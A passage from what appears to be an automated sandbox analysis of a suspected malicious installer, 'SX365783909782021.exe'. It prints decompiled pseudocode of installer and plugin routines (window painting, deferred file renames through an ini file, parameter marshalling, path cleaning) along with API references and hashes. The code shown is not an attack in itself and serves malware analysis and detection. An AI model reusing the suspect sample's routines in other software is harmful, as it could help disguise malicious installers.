						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x4236a0, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x423ea8;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                                                                        0x0040100a
                                                                                        0x00401039
                                                                                        0x00401047
                                                                                        0x0040104d
                                                                                        0x00401051
                                                                                        0x0040105b
                                                                                        0x00401061
                                                                                        0x00401064
                                                                                        0x004010f3
                                                                                        0x00401089
                                                                                        0x0040108c
                                                                                        0x004010a6
                                                                                        0x004010bd
                                                                                        0x004010cc
                                                                                        0x004010cf
                                                                                        0x004010d5
                                                                                        0x004010d9
                                                                                        0x004010e4
                                                                                        0x004010ed
                                                                                        0x004010ef
                                                                                        0x004010ef
                                                                                        0x00401100
                                                                                        0x00401105
                                                                                        0x0040110d
                                                                                        0x00401110
                                                                                        0x00401112
                                                                                        0x00401118
                                                                                        0x0040111f
                                                                                        0x00401126
                                                                                        0x00401130
                                                                                        0x00401142
                                                                                        0x00401156
                                                                                        0x00401160
                                                                                        0x00401165
                                                                                        0x00401165
                                                                                        0x00401110
                                                                                        0x0040116e
                                                                                        0x00000000
                                                                                        0x00401178
                                                                                        0x00401010
                                                                                        0x00401013
                                                                                        0x00401015
                                                                                        0x0040101f
                                                                                        0x0040101f
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                                        • GetClientRect.USER32 ref: 0040105B
                                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                        • FillRect.USER32 ref: 004010E4
                                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                        • DrawTextA.USER32(00000000,004236A0,000000FF,00000010,00000820), ref: 00401156
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                        • String ID: F
                                                                                        • API String ID: 941294808-1304234792
                                                                                        • Opcode ID: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                                                                                        • Instruction ID: 81477e3a2fde3fb3f26aa953fc06e347994717d76cab2c79682594c458f31f57
                                                                                        • Opcode Fuzzy Hash: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                                                                                        • Instruction Fuzzy Hash: 8141BC71804249AFCB058FA4CD459BFBFB9FF44314F00802AF551AA1A0C378EA54DFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004058B4, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144filememoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 93%
                                                                                        			E004058B4() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405E88(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423f30 =  *0x423f30 + 1;
						return _t20;
					}
				}
				 *0x422630 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x4220a8, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421ca8, "%s=%s\r\n", 0x422630, 0x4220a8);
						_t56 = _t55 + 0x10;
						E00405B88(_t43, 0x400, 0x4220a8, 0x4220a8,  *((intOrPtr*)( *0x423eb0 + 0x128)));
						_t20 = E0040583D(0x4220a8, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E004057B2(_t51, "[Rename]\r\n") != 0) {
								_t28 = E004057B2(_t26 + 0xa, 0x409350);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E004057FE(_t51 + _t29, 0x421ca8, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405B66(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040583D(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x422630, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}





















                                                                                        0x004058ba
                                                                                        0x004058c1
                                                                                        0x004058c5
                                                                                        0x004058ce
                                                                                        0x004058d2
                                                                                        0x00405a11
                                                                                        0x00405a11
                                                                                        0x00000000
                                                                                        0x00405a11
                                                                                        0x004058d2
                                                                                        0x004058de
                                                                                        0x004058f4
                                                                                        0x0040591c
                                                                                        0x00405927
                                                                                        0x0040592b
                                                                                        0x0040594b
                                                                                        0x00405952
                                                                                        0x0040595c
                                                                                        0x00405969
                                                                                        0x0040596e
                                                                                        0x00405973
                                                                                        0x00405977
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405986
                                                                                        0x00405988
                                                                                        0x00405995
                                                                                        0x00405999
                                                                                        0x00405a0a
                                                                                        0x00405a0b
                                                                                        0x00000000
                                                                                        0x004059b5
                                                                                        0x004059c2
                                                                                        0x00405a27
                                                                                        0x00405a2e
                                                                                        0x004059d5
                                                                                        0x004059d5
                                                                                        0x004059d7
                                                                                        0x004059e0
                                                                                        0x004059eb
                                                                                        0x004059fd
                                                                                        0x00405a04
                                                                                        0x00000000
                                                                                        0x00405a04
                                                                                        0x00405a30
                                                                                        0x00405a31
                                                                                        0x00405a36
                                                                                        0x00405a38
                                                                                        0x00405a45
                                                                                        0x00405a45
                                                                                        0x00405a49
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405a3a
                                                                                        0x00405a3a
                                                                                        0x00405a3d
                                                                                        0x00405a40
                                                                                        0x00405a41
                                                                                        0x00000000
                                                                                        0x00405a3a
                                                                                        0x004059cd
                                                                                        0x004059d2
                                                                                        0x00000000
                                                                                        0x004059d2
                                                                                        0x00405999
                                                                                        0x004058f6
                                                                                        0x00405901
                                                                                        0x0040590a
                                                                                        0x0040590e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040590e
                                                                                        0x00405a1b

                                                                                        APIs
                                                                                          • Part of subcall function 00405E88: GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                          • Part of subcall function 00405E88: LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                          • Part of subcall function 00405E88: GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,00405649,?,00000000,000000F1,?), ref: 00405901
                                                                                        • GetShortPathNameA.KERNEL32 ref: 0040590A
                                                                                        • GetShortPathNameA.KERNEL32 ref: 00405927
                                                                                        • wsprintfA.USER32 ref: 00405945
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,004220A8,C0000000,00000004,004220A8,?,?,?,00000000,000000F1,?), ref: 00405980
                                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 0040598F
                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004059A5
                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421CA8,00000000,-0000000A,00409350,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004059EB
                                                                                        • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 004059FD
                                                                                        • GlobalFree.KERNEL32 ref: 00405A04
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A0B
                                                                                          • Part of subcall function 004057B2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057B9
                                                                                          • Part of subcall function 004057B2: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057E9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                                                                                        • String ID: %s=%s$0&B$[Rename]
                                                                                        • API String ID: 3772915668-951905037
                                                                                        • Opcode ID: 0c179fa3417d280b53e5d95a4378c92fb06f2b6e7dc6de3d5fc3f6893b1dd3a2
                                                                                        • Instruction ID: 8912a0e40cac8f66f34925055924fb713260e7a12edb00ecfb1cfbef244c1689
                                                                                        • Opcode Fuzzy Hash: 0c179fa3417d280b53e5d95a4378c92fb06f2b6e7dc6de3d5fc3f6893b1dd3a2
                                                                                        • Instruction Fuzzy Hash: D9411332B05B11BBD3216B61AD88F6B3A5CDB84715F140136FE05F22C2E678A801CEBD
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 737624D8, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 124COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 77%
                                                                                        			E737624D8(intOrPtr* _a4) {
				char _v80;
				int _v84;
				intOrPtr _v88;
				short _v92;
				intOrPtr* _t28;
				void* _t30;
				intOrPtr _t31;
				signed int _t43;
				void* _t44;
				intOrPtr _t45;
				void* _t48;

				_t44 = E73761215();
				_t28 = _a4;
				_t45 =  *((intOrPtr*)(_t28 + 0x814));
				_v88 = _t45;
				_t48 = (_t45 + 0x41 << 5) + _t28;
				do {
					if( *((intOrPtr*)(_t48 - 4)) >= 0) {
					}
					_t43 =  *(_t48 - 8) & 0x000000ff;
					if(_t43 <= 7) {
						switch( *((intOrPtr*)(_t43 * 4 +  &M73762626))) {
							case 0:
								 *_t44 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									_v84 = __ecx;
									__ecx =  *(0x7376307c + __edx * 4);
									__edx = _v84;
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x7376309c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E73761429(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__eax = lstrcpynA(__edi,  *__eax,  *0x7376405c);
								goto L17;
							case 4:
								__ecx =  *0x7376405c;
								__edx = __ecx - 1;
								__eax = WideCharToMultiByte(__ebx, __ebx,  *__eax, __ecx, __edi, __edx, __ebx, __ebx);
								__eax =  *0x7376405c;
								 *((char*)(__eax + __edi - 1)) = __bl;
								goto L17;
							case 5:
								__ecx =  &_v80;
								_push(0x27);
								_push(__ecx);
								_push( *__eax);
								__imp__StringFromGUID2();
								__eax =  &_v92;
								__eax = WideCharToMultiByte(__ebx, __ebx,  &_v92,  &_v92, __edi,  *0x7376405c, __ebx, __ebx);
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfA(__edi, 0x73764000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t30 =  *(_t48 + 0x14);
					if(_t30 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t48 - 4)) > 0)) {
						GlobalFree(_t30);
					}
					_t31 =  *((intOrPtr*)(_t48 + 0xc));
					if(_t31 != 0) {
						if(_t31 != 0xffffffff) {
							if(_t31 > 0) {
								E737612D1(_t31 - 1, _t44);
								goto L26;
							}
						} else {
							E73761266(_t44);
							L26:
						}
					}
					_v88 = _v88 - 1;
					_t48 = _t48 - 0x20;
				} while (_v88 >= 0);
				return GlobalFree(_t44);
			}














                                                                                        0x737624e4
                                                                                        0x737624e6
                                                                                        0x737624f0
                                                                                        0x737624f6
                                                                                        0x73762500
                                                                                        0x73762504
                                                                                        0x73762509
                                                                                        0x73762509
                                                                                        0x73762511
                                                                                        0x73762518
                                                                                        0x7376251e
                                                                                        0x00000000
                                                                                        0x73762525
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x7376252c
                                                                                        0x73762530
                                                                                        0x73762533
                                                                                        0x73762537
                                                                                        0x7376253e
                                                                                        0x73762542
                                                                                        0x73762548
                                                                                        0x7376254a
                                                                                        0x7376254c
                                                                                        0x7376254c
                                                                                        0x73762553
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x7376255c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x7376256c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73762598
                                                                                        0x737625a0
                                                                                        0x737625aa
                                                                                        0x737625ac
                                                                                        0x737625b1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73762574
                                                                                        0x73762578
                                                                                        0x7376257a
                                                                                        0x7376257b
                                                                                        0x7376257d
                                                                                        0x7376258d
                                                                                        0x73762594
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x737625b7
                                                                                        0x737625b9
                                                                                        0x737625bf
                                                                                        0x737625c5
                                                                                        0x737625c5
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x7376251e
                                                                                        0x737625c8
                                                                                        0x737625c8
                                                                                        0x737625cd
                                                                                        0x737625de
                                                                                        0x737625de
                                                                                        0x737625e4
                                                                                        0x737625e9
                                                                                        0x737625ee
                                                                                        0x737625fa
                                                                                        0x737625ff
                                                                                        0x00000000
                                                                                        0x73762604
                                                                                        0x737625f0
                                                                                        0x737625f1
                                                                                        0x73762605
                                                                                        0x73762605
                                                                                        0x737625ee
                                                                                        0x73762606
                                                                                        0x7376260a
                                                                                        0x7376260d
                                                                                        0x73762625

                                                                                        APIs
                                                                                          • Part of subcall function 73761215: GlobalAlloc.KERNELBASE(00000040,73761233,?,737612CF,-7376404B,737611AB,-000000A0), ref: 7376121D
                                                                                        • GlobalFree.KERNEL32 ref: 737625DE
                                                                                        • GlobalFree.KERNEL32 ref: 73762618
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.213558284.0000000073761000.00000020.00020000.sdmp, Offset: 73760000, based on PE: true
                                                                                        • Associated: 00000000.00000002.213546803.0000000073760000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.213566406.0000000073763000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.213570908.0000000073765000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Global$Free$Alloc
                                                                                        • String ID: {t@ut
                                                                                        • API String ID: 1780285237-3262140062
                                                                                        • Opcode ID: 6d3d50c2d807d56a25a7679f59200d8c8c02ba9882ac8b94ef64a691bf32ee96
                                                                                        • Instruction ID: 5027afc55aa0187763d08b752e90429c1cfe3ce6aa1de30e17dbe14847948ff3
                                                                                        • Opcode Fuzzy Hash: 6d3d50c2d807d56a25a7679f59200d8c8c02ba9882ac8b94ef64a691bf32ee96
                                                                                        • Instruction Fuzzy Hash: 0741037260420AEFE3169F54CDB8F2A77BAEB85300B1445ADF9468B161D7359808DF73
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 737622F1, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 86%
                                                                                        			E737622F1(void* __edx, intOrPtr _a4) {
				signed int _v4;
				signed int _v8;
				void* _t38;
				signed int _t39;
				void* _t40;
				void* _t43;
				void* _t48;
				signed int* _t50;
				signed char* _t51;

				_v8 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
				while(1) {
					_t9 = _a4 + 0x818; // 0x818
					_t51 = (_v8 << 5) + _t9;
					_t38 = _t51[0x18];
					if(_t38 == 0) {
						goto L9;
					}
					_t48 = 0x1a;
					if(_t38 == _t48) {
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						if(_t38 <= 0 || _t38 > 0x19) {
							_t51[0x18] = _t48;
						} else {
							_t38 = E737612AD(_t38 - 1);
							L10:
						}
						goto L11;
					} else {
						_t38 = E7376123B();
						L11:
						_t43 = _t38;
						_t13 =  &(_t51[8]); // 0x820
						_t50 = _t13;
						if(_t51[4] >= 0) {
						}
						_t39 =  *_t51 & 0x000000ff;
						_t51[0x1c] = _t51[0x1c] & 0x00000000;
						_v4 = _t39;
						if(_t39 > 7) {
							L27:
							_t40 = GlobalFree(_t43);
							if(_v8 == 0) {
								return _t40;
							}
							if(_v8 !=  *((intOrPtr*)(_a4 + 0x814))) {
								_v8 = _v8 + 1;
							} else {
								_v8 = _v8 & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t39 * 4 +  &M7376247E))) {
								case 0:
									 *_t50 =  *_t50 & 0x00000000;
									goto L27;
								case 1:
									__eax = E737612FE(__ebx);
									goto L20;
								case 2:
									 *__ebp = E737612FE(__ebx);
									_a4 = __edx;
									goto L27;
								case 3:
									__eax = E73761224(__ebx);
									 *(__esi + 0x1c) = __eax;
									L20:
									 *__ebp = __eax;
									goto L27;
								case 4:
									 *0x7376405c =  *0x7376405c +  *0x7376405c;
									__edi = GlobalAlloc(0x40,  *0x7376405c +  *0x7376405c);
									 *0x7376405c = MultiByteToWideChar(0, 0, __ebx,  *0x7376405c, __edi,  *0x7376405c);
									if(_v4 != 5) {
										 *(__esi + 0x1c) = __edi;
										 *__ebp = __edi;
									} else {
										__eax = GlobalAlloc(0x40, 0x10);
										_push(__eax);
										 *(__esi + 0x1c) = __eax;
										_push(__edi);
										 *__ebp = __eax;
										__imp__CLSIDFromString();
										__eax = GlobalFree(__edi);
									}
									goto L27;
								case 5:
									if( *__ebx != 0) {
										__eax = E737612FE(__ebx);
										 *__edi = __eax;
									}
									goto L27;
								case 6:
									__esi =  *(__esi + 0x18);
									__esi = __esi - 1;
									__esi = __esi *  *0x7376405c;
									__esi = __esi +  *0x73764064;
									__eax = __esi + 0xc;
									 *__edi = __esi + 0xc;
									asm("cdq");
									__eax = E73761429(__edx, __esi + 0xc, __edx, __esi);
									goto L27;
							}
						}
					}
					L9:
					_t38 = E73761224(0x73764034);
					goto L10;
				}
			}












                                                                                        0x73762306
                                                                                        0x7376230a
                                                                                        0x73762315
                                                                                        0x73762315
                                                                                        0x7376231c
                                                                                        0x73762321
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73762325
                                                                                        0x73762328
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x7376232d
                                                                                        0x73762338
                                                                                        0x73762348
                                                                                        0x7376233f
                                                                                        0x73762341
                                                                                        0x73762357
                                                                                        0x73762357
                                                                                        0x00000000
                                                                                        0x7376232f
                                                                                        0x7376232f
                                                                                        0x73762358
                                                                                        0x7376235c
                                                                                        0x7376235e
                                                                                        0x7376235e
                                                                                        0x73762361
                                                                                        0x73762361
                                                                                        0x73762369
                                                                                        0x7376236c
                                                                                        0x73762373
                                                                                        0x73762377
                                                                                        0x73762446
                                                                                        0x73762447
                                                                                        0x73762452
                                                                                        0x7376247d
                                                                                        0x7376247d
                                                                                        0x73762462
                                                                                        0x7376246e
                                                                                        0x73762464
                                                                                        0x73762464
                                                                                        0x73762464
                                                                                        0x00000000
                                                                                        0x7376237d
                                                                                        0x7376237d
                                                                                        0x00000000
                                                                                        0x73762384
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x7376238d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x7376239b
                                                                                        0x7376239e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x737623a7
                                                                                        0x737623ac
                                                                                        0x737623af
                                                                                        0x737623b0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x737623bd
                                                                                        0x737623c8
                                                                                        0x737623d7
                                                                                        0x737623e2
                                                                                        0x73762405
                                                                                        0x73762408
                                                                                        0x737623e4
                                                                                        0x737623e8
                                                                                        0x737623ee
                                                                                        0x737623ef
                                                                                        0x737623f2
                                                                                        0x737623f3
                                                                                        0x737623f6
                                                                                        0x737623fd
                                                                                        0x737623fd
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73762410
                                                                                        0x73762413
                                                                                        0x7376241f
                                                                                        0x73762421
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x73762424
                                                                                        0x73762427
                                                                                        0x73762428
                                                                                        0x7376242f
                                                                                        0x73762436
                                                                                        0x73762439
                                                                                        0x7376243b
                                                                                        0x7376243e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x7376237d
                                                                                        0x73762377
                                                                                        0x7376234d
                                                                                        0x73762352
                                                                                        0x00000000
                                                                                        0x73762352

                                                                                        APIs
                                                                                        • GlobalFree.KERNEL32 ref: 73762447
                                                                                          • Part of subcall function 73761224: lstrcpynA.KERNEL32(00000000,?,737612CF,-7376404B,737611AB,-000000A0), ref: 73761234
                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 737623C2
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 737623D7
                                                                                        • GlobalAlloc.KERNEL32(00000040,00000010), ref: 737623E8
                                                                                        • CLSIDFromString.OLE32(00000000,00000000), ref: 737623F6
                                                                                        • GlobalFree.KERNEL32 ref: 737623FD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.213558284.0000000073761000.00000020.00020000.sdmp, Offset: 73760000, based on PE: true
                                                                                        • Associated: 00000000.00000002.213546803.0000000073760000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.213566406.0000000073763000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.213570908.0000000073765000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                                        • String ID: @ut
                                                                                        • API String ID: 3730416702-3384101347
                                                                                        • Opcode ID: 9d77641b906e4f0af447971437fa7d0d31718ef554dd2994f99fb6988f40318a
                                                                                        • Instruction ID: 89870de0a867b3b6744e930e54b3c19cd572e26c18bb5de0f4a1ee703605dc59
                                                                                        • Opcode Fuzzy Hash: 9d77641b906e4f0af447971437fa7d0d31718ef554dd2994f99fb6988f40318a
                                                                                        • Instruction Fuzzy Hash: 3B41B17150870AEFE3519F22C968B2A7BF9FB84311F14481AFC4ADB190D7349948CB63
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405DC8, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00405DC8(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004056C6(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405684("*?|<>/\":", _t5))) == 0) {
							E004057FE(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                        0x00405dca
                                                                                        0x00405dd2
                                                                                        0x00405de6
                                                                                        0x00405de6
                                                                                        0x00405dec
                                                                                        0x00405df9
                                                                                        0x00405df9
                                                                                        0x00405dfa
                                                                                        0x00405dfc
                                                                                        0x00405e00
                                                                                        0x00405e02
                                                                                        0x00405e0b
                                                                                        0x00405e0d
                                                                                        0x00405e27
                                                                                        0x00405e2f
                                                                                        0x00405e2f
                                                                                        0x00405e34
                                                                                        0x00405e36
                                                                                        0x00405e38
                                                                                        0x00405e3c
                                                                                        0x00405e3d
                                                                                        0x00405e40
                                                                                        0x00405e48
                                                                                        0x00405e4a
                                                                                        0x00405e4e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405e54
                                                                                        0x00405e59
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405e59
                                                                                        0x00405e5e

                                                                                        APIs
                                                                                        • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SX365783909782021.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E20
                                                                                        • CharNextA.USER32(?,?,?,00000000), ref: 00405E2D
                                                                                        • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SX365783909782021.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E32
                                                                                        • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\SX365783909782021.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E42
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
